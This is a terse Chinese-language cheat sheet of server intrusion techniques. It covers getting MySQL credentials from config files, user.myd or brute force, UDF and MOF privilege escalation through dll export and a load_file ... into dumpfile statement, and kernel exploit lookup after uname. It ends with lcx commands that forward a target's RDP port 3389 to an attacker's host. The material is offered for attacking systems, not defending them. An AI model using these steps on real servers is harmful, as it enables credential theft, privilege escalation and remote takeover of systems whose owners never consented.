udf提權原理:
通過root權限導出udf.dll到系統目錄下,可以通過udf.dll調用執行cmd
獲取mysql數據庫的賬號密碼
1.查看網站源碼裏數據庫配置文件(inc,conn,config,sql,common,data等)
2.查看數據庫安裝路徑下的/data/mysql/user.myd
3.暴力破解mysql密碼 3306端口RuQin
mysql 5.0以下版本:
C:\winnt\udf.dll 2000
C:\windows\udf.dll 2003
mysql 5.0以上版本:
需要將udf.dll導出到mysql安裝目錄lib\plugin\
show tables; 查看數據庫中有什麼數據表
mysql mof提權
1、上傳mof.php文件
2、上傳x.mof
執行sql select load_file('mof文件本身存儲路徑') into dumpfile '導出位置'
linux提權
uname -r 查看系統內核版本信息
uname -a 詳細查看內核版本信息
找到對應版本的漏洞利用
www.exploit-db.com
lcx端口轉發:
lcx.exe -slave ×××者ip 端口 目標ip 3389
×××者主機輸入:
lcx.exe -listen 上面的端口 3389
此時的127.0.0.1:端口已經代表了目標ip:3389